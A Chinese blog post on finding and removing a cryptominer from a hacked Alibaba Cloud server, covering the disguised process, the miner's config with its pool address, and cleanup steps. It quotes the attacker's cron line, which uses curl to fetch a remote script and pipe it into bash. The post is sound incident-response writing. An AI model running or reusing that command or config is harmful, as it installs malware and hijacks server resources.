阿里云服务器被攻击,CPU被占满

最新推荐文章于 2024-05-24 15:42:40 发布
最新推荐文章于 2024-05-24 15:42:40 发布
阅读量1.5k 收藏 3
点赞数
文章标签: 服务器 阿里云 安全 cpu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43085094/article/details/122064395
版权

阿里云服务器被攻击,CPU被占满

cpu占用99.9%

这两天发现服务器上cpu一直是满负荷,查看了一下top发现是postgres的[ddns]占满了,网上搜了一下postgres的cpu占用问题,都说是sql查询的问题,可我sql都停了,没有查询,cpu还是占用接近99.9%,搜索ddns看看是什么也没查出来为什么cpu占用这么高。
切换postgres用户ps -ux查看该命令 ./[ddns] --config=./[ddns].pid
在这里插入图片描述
查了一下发现有个目录,里面有这个文件,(这时我还没发现是被攻击)

find / -name *ddns*

在这里插入图片描述

[ddns].pid.bak里面有个ip 194.147.114.20:45543

{
    "autosave": true,
    "background": true,
     "cpu": {
        "enabled": true,
        "huge-pages": true,
        "huge-pages-jit": false,
        "hw-aes": null,
        "priority": null,
        "memory-pool": false,
        "yield": true,
        "max-threads-hint": 70,
        "asm": true,
        "argon2-impl": null,
        "astrobwt-max-size": 550,
        "astrobwt-avx2": false,
        "cn/0": false,
        "cn-lite/0": false
    },
    "log-file":"/var/tmp/.../.ddns.log", 
    "opencl": false,
    "cuda": false,
    "pools": [
        
        { 
            "url": "194.147.114.20:45543"
        }
    ]
}

在网上用ip解析发现是瑞士
在这里插入图片描述
看了一下 往这个/var/tmp/…/.ddns.log 日志文件写了什么,意识到有可能被攻击了,网上查了一下,确定了是被攻击了

.ddns.log
在postgres用户下的crontab -l发现有个定时任务,定时获取一个a.sh
这样的话,就算kill -9 也没有用,它会定时恢复

*/30 * * * * /bin/curl -fsSL http://crypto.htxreceive.top/s3f815/a/a.sh | bash > /dev/null 2>&1

删除该用户下的crontab,如果你有其他的定时任务,用crontab -e 编辑

crontab -r

然后把/var/tmp/.crypto这个目录给删了,在kill掉哪个进程就可以了

查询authorized_keys是不是有自动登录的密钥
有的话删除掉这个用户还有这个文件

find / -name authorized_keys

大致原因我怀疑是我的postgres密码比较简单,因为它是在postgres用户下创建的

更详细的可以查看这位老哥的帖子
阿里云服务器被[crypto]攻击导致CPU爆满(已解决)

赵小白的成长之路
关注
服务器遭受攻击CPU升高,流量升高,你一般如何处理
vivlol918的博客
08-23 1160
某些用户可能会故意滥用服务器资源,例如执行大量计算密集型任务、非法下载和分享文件等。这些行为也会导致服务器负载升高、CPU占用率升高和网络流量增加。
彻底告别Alibaba PC Safe Service:高CPU占用问题的终极解决方案
最新发布
nntxthml的博客
10-11 1914
通过上述步骤,我们应该能够彻底删除Alibaba PC Safe Service,从而恢复系统的流畅运行。以管理员身份运行:在修改服务属性和删除服务时,确保以管理员身份运行相关程序。耐心等待:在删除服务后,可能需要等待一段时间来确保Windows服务管理器更新其状态。因此,在重启电脑之前,不要急于删除残留文件。使用第三方工具:如果无法删除某些文件或文件夹,可以尝试使用第三方文件解锁工具来解锁它们。希望这篇文章能够帮助大家彻底摆脱Alibaba PC Safe Service的困扰,恢复系统的流畅运行。
阿里云服务器CPU被陌生进程
zhsh5395的专栏
05-29 799
方法1:执行cd /var/spool/cron/ cat root 可以看到这行代码,删掉就好了 方法2:获取命令crontab -e查看定时任务
服务器攻击导致CPU100%的解决
过于丰富,无法简介
09-07 5881
排除服务器上是否有定时任务、顽固脚本等问题 top指令查看cpu占用情况: `` 尝试使用kill指令杀死对应进程,杀完之后发现对应服务依旧会重启: kill -9 pid 查看服务器进程数量,进程数量偏高确实存在问题: netstat -anp |grep tcp |wc -l 查看系统中存在的定时任务,定时任务与占用CPU最高的服务名称相同尝试关闭定时任务 crontab -l 修改定时任务的文件,删除定时任务保存。保存后发现还是会向服务中添加定时任务 crontab -e 直接停止定时任务进程
网站服务器突然负载CPU,是被攻击了吗
dexunyun的博客
02-06 2991
随着互联网的发展,个人建站非常普遍,有的用户自己网站业务在正常运行中,网站被恶意攻击,也是时常有发生,一些个人或小型网站,由于没有专业的技术人员维护,一旦遭到攻击,网站就会瞬间瘫痪。 网站遇到攻击最多的就是CC攻击了,相信大家都应该有过这样的经历,就是在某网站举行活动的时候,大量人员同时访问这网站时,打开页面的速度会比以前较慢,当访问的人越多,数据库压力就越大,被访问的频率也越高,占用的系统资源也就越高。 CC攻击的原理就是攻击者模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就
服务器CPU?被攻击了?
smonai的博客
09-08 707
CC其实也是DDos攻击的一种,CC攻击是通过借助代理服务器模拟真实用户请求,实现DDOS和伪装,通过制造大量的后台数据库查询动作来攻击页面,消耗目标资源,造成服务器宕机。 CC攻击的防护思路 1.部署架构 可将前端WAF或者负载均衡设备部署于HTTPS卸载器之后,从而实现对HTTPS流量的防护能力。 2.使用IP地址信誉库 对请求IP地址进行甄别和过滤,阻止来自恶意IP的服务请求。 3.轻应用部署 应用部署时考虑页面静态比例,尽量让网站静态化,减少不必要的动态查询等方式,同时应急情况下可以
阿里云服务器攻击的危害有多大
XiaoYiLiangZai的博客
03-30 402
游戏行业的快速发展、高额的攻击利润、日趋激烈的行业竞争,让中国游戏行业的进军者们,每天都面临业务和安全的双重挑战。 游戏行业一直是竞争、攻击最为复杂的一个江湖。 曾经多少充激情的创业团队、玩法极具特色的游戏产品,被互联网攻击的问题扼杀在摇篮里;又有多少运营出色的游戏产品,因为遭受DDoS攻击,而一蹶不振。 DDoS攻击的危害 小蚁安盾安全发布的2017年上半年的游戏行业DDoS攻击态势报告中指出:2017年1月至2017年6月,游戏行业大于300G以上的攻击超过1800次,攻击最大峰值为608G..
阿里云ECS服务器CPU如果经常100%跑该怎么检查?
m0_55512894的博客
02-25 1119
一、背景和现象 初创公司,架构lanmp,web前端和后端分开服务器,业务驱动主要是nginx和apache,nginx主要是处理静态文件和反向代理,前后端、搜索引擎、缓存、队列等附加的服务都是用docker容器部署。因为比较初级,上传文件和采集文件都是直接写在硬盘上,涉及到的目录共享,就在其中一台服务器存储并且nfs共享。我们暂且分为ECS1(apache1)、ECS2(apache2)、ECS3(nginx)...
阿里云服务器攻击危害有多大
xyyaq的博客
04-07 488
根据全球游戏和全球移动互联网行业第三方分析机构Newzoo的数据显示:2017年上半年,中国以275亿美元的游戏市场收入超过美国和日本,成为全球榜首。 游戏行业的快速发展、高额的攻击利润、日趋激烈的行业竞争,让中国游戏行业的进军者们,每天都面临业务和安全的双重挑战。 游戏行业一直是竞争、攻击最为复杂的一个江湖。 曾经多少充激情的创业团队、玩法极具特色的游戏产品,被互联网攻击的问题扼杀在摇篮里;又有多少运营出色的游戏产品,因为遭受DDoS攻击,而一蹶不振。 DDoS攻击的危害 小蚁安盾安全发布的20
阿里云服务器被挖矿程序侵入问题
samfaker的博客
08-23 1398
gitlab漏洞引起的无文件、无定时任务的挖矿程序解决方法
阿里云服务器被ddos攻击100g怎么办?
m0_67776192的博客
04-21 3107
突然收到一条阿里云发来的信息: 为了保障服务器的稳定运行,您的IP:139.196.95.XX实例名称:网络人 已启动限流保护措施,阈值与产品规格相关,您可以登陆云盾控制台调整清洗阈值。 发现网站打不开,SSH也无法登陆,使用了控制台重启命令,没有任何反应,开始方了!! 发现可以通过控制台提供的SSH登陆查看。开始我以后服务器出现了错误,因为我在后台看到了CPU与带宽有一个瞬间峰值,明显的不正常,以后服务器被黑掉了。 通过查看历史命令发现了2条: MAKRER=SHOW_LOCALE;printf
阿里云服务器CPU或抛高及带宽跑怎样排查分析原因?(图文教程)
热门推荐
tianjinsong的专栏
09-18 1万+
https://www.wanweiwang.cn/FAQ/view/884.html 如果您使用阿里云服务器 ECS 时,若出现服务的速度变慢,或 ECS 实例突然断开,可以考虑服务器带宽和 CPU 是否有跑或跑高的问题。Linux 系统下,您可以按如下步骤进行排查: 定位问题。找到影响带宽和 CPU或跑高的具体进程。 分析处理。排查影响带宽和 CPU或跑高的进...
阿里云服务器cpu使用率一直100%,疑似中了病毒脚本
下雨了亦留此地的博客
10-13 736
参考文章 cpu使用率一直100% TCP 之 SYN_SENT状态 linux下查询进程对应文件 亲测有效 其它
阿里云服务器被[crypto]攻击导致CPU(已解决)
大鹏
07-14 1717
缘由 之前玩Docker并开放了2375端口和redis 弱密码 且默认6379端口 的时候,安装时未使用密码,然后还在阿里云开放了0.0.0.0的6379端口,导致出现了漏洞, 现象 被安装了Docker镜像且启用了容器运行。 Reids多了几条任务计划的缓存数据 /usr/share 目录下多了 5个文件 -rwxr-xr-x 1 root root 4563624 Jul 1 17:46 '[crypto]' -rw-r--r-- 1 root root 4384...
关于window操作系统中出现svchost.exe 持续占用80%CPU问题解决方案
任飞
03-13 8436
写在前面 解决问题之前,首先要知道什么是svchost.exe,svchost.exe是一个属于微软Windows操作系统的系统程序,微软官方对它的解释是:svchost.exe是从动态链接库(DLL)中运行的服务的通用主机进程名称。这个程序对系统的正常运行是非常重要,而且使不能被结束的。简单的说没有这个服务机器几乎就是上不了网,很多应用服务都是以来于这个接口RPC,如果发现这个进程占用...
服务器啥也没跑cpu
恒创科技Henghost
05-24 465
服务器可能被恶意软件感染,这些软件可能会在后台运行,占用大量CPU资源。:您的服务器可能正受到DDoS攻击,这会消耗大量CPU资源。如果自己无法解决问题,可以联系云服务提供商的技术支持获取帮助。:应用程序可能存在资源泄露的问题,导致CPU使用率持续上升。:不正确的配置可能导致CPU资源的浪费。:系统内部错误可能导致CPU占用异常。
阿里云机器中毒
weixin_33807284的博客
03-09 289
昨天晚上收到阿里云的短信和邮件,说服务器中毒,内容如下: 经检测您的云服务器(ip)存在恶意发包行为,为避免影响您服务器的正常使用,请您务必重视并尽快处理,需要您尽快排查您的安全隐患。目前系统不会处罚您的机器,但请您务必重视。 就怕被惩罚(近小黑屋),所以赶紧登录服务器,上去之后没发现什么异常,但是发现这台机器竟然一直是裸奔状态,赶紧安装...
阿里云服务器被侵入,占用大量cpu解决办法
Lemon_MY的博客
07-02 1887
原因:利用redis漏洞侵入,植入木马程序。 解决:cat /var/spool/cron/root发现被写入自动下载代码,lsattr /var/spool/cron/root查看文件被修改的权限,chattr -isa /var/spool/cron/root去掉权限,vim /var/spool/cron/root去掉代码,wq保存退出。使用top命令查看占用cpu的程序及其pid号,ps -ef|grep pid号查找到程序位置,chattr -i 去掉权限,然后rm -rf删除文件。 注意:漏洞是
linux 无缘无故吃内存,救命,Linux正在吃掉我的内存
weixin_39614262的博客
04-30 254
... 内存发现自己的空闲空间越来越少,经过一番调查,发现罪魁祸首居然是Linux老大!内存:Linux老大,这也没几个程序在运行,可是你为什么老是占用我的内存啊,内存都快被你吃光了!Linux :你的容量那么大,空间闲着也是闲着,我啊,把那些空闲的空间都当成文件缓存了!... 内存: 你看看你, 把这文件“拆成”了4K的碎片,这儿放一片,那儿放一片,把我的内存空间搞得乱糟糟的。Linux :...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值